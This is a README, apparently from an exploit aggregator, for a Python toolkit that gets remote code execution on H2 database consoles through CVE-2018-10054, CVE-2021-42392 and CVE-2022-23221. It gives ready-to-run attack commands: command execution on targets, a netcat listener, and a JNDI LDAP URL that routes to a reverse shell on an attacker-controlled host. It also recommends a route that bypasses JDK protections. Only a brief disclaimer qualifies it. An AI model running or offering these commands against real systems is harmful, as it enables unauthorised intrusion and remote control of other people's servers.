Share
## https://sploitus.com/exploit?id=30361B78-C2EB-5D58-A147-9DAC07D188A7
# H2 Console RCE Exploit Toolkit
Vulnerability exploitation scripts for H2 console vulnerabilities in the CVE-2018-10054, CVE-2021-42392, and CVE-2022-23221 series. ## Requirements
- Python 3.6+ ยท `pip install requests`
- For CVE-2021, additional JNDI tools are required:
- **JNDIExploit**: https://github.com/0x727/JNDIExploit
- **Java-Chains**: https://github.com/frohoff/ysoserial (or alternative tools)
## Scripts
### CVE-2018-10054 & CVE-2022-23221 โ `cve2022-23211/CVE2022_H2_RCE.py`
`-t` supports URL format (`https://host:port`) or IP+port format (`-t host -p 8080`). ```bash
python cve2022-23211/CVE2022_H2_RCE.py -t 192.168.1.100 -p 8080 --cve 2018 -c "id"
python cve2022-23211/CVE2022_H2_RCE.py -t 192.168.1.100 -p 8080 --cve 2022 -c "whoami"
python cve2022-23211/CVE2022_H2_RCE.py -t https://192.168.1.100:8443 --probe
```
| Arg | Description |
|-----|------|
| `-t` | Target |
| `-p` | Port (optional for URL format) |
| `--cve {2018,2022}` | CVE version (auto if omitted) |
| `-c` | Command (default: "id") |
| `--probe` | Only probe |
### CVE-2021-42392 โ `cve-2021-42392/CVE2021_H2_JNDI_RCE.py`
Prerequisite: `nc -lvnp ` + `java -jar JNDIExploit-1.3.jar -i `
```bash
python cve-2021-42392/CVE2021_H2_JNDI_RCE.py -t 192.168.1.100 -p 8080 -j "ldap://x.x:1389/TomcatBypass/ReverseShell/x.x/6666"
python cve-2021-42392/CVE2021_H2_JNDI_RCE.py -t https://192.168.1.100:8443 --probe
```
| Arg | Description |
|-----|------|
| `-t` | Target |
| `-p` | Port (optional for URL format) |
| `-j` | JNDI LDAP URL |
| `--probe` | Only probe |
**JNDI Routing**: `TomcatBypass/ReverseShell` (recommended, bypasses JDK>8u191 / container isolation) ยท `Basic/ReverseShell` (alternative, requires JDK) **Disclaimer**: This tool is for educational purposes only; do not use for illegal purposes. All risks are assumed by the user.